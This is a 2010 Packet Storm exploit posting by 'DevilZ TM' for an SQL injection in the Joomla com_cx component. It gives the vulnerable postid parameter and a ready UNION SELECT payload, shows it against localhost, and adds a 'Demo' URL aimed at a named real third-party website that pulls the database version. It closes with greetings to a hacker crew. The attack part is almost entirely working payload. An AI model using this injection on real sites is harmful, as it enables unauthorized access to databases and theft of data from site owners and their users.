Joomla CX SQL Injection

2010-03-23T00:00:00
ID PACKETSTORM:87561
Type packetstorm
Reporter DevilZ TM
Modified 2010-03-23T00:00:00

Description

                                        
                                            `# Title : Joomla Component com_cx SQL Injection Vulnerability  
# Author: DevilZ TM  
# Data : 2010-03-23  
  
[~]######################################### InformatioN #############################################[~]  
  
[~] Title : Joomla Component com_cx SQL Injection Vulnerability  
[~] Author : DevilZ TM By D3v1l  
[~] Homepage : http://www.DEVILZTM.com  
[~] Email : Expl0it@DevilZTM.Com  
[~] Contact : D3v1l.blackhat@yahoo.com  
  
[~]######################################### ExploiT #############################################[~]  
  
[~] Vulnerable File :  
  
http://127.0.0.1/index.php?option=com_cx&task=postview&postid=[SQL]  
  
[~] ExploiT :  
  
-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--  
  
[~] Example :  
  
http://127.0.0.1/index.php?option=com_cx&task=postview&postid=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--  
  
[~] Demo :  
  
http://tijaratonline.com/index.php?option=com_cx&task=postview&postid=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,version(),34,35,36,37,38,39,40,41--  
  
  
[~]######################################### ThankS To ... ############################################[~]  
  
[~] Special Thanks To My Best FriendS :  
  
Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS  
  
[~] IRANIAN Young HackerZ  
  
[~]######################################### FinisH :D #############################################[~]  
  
`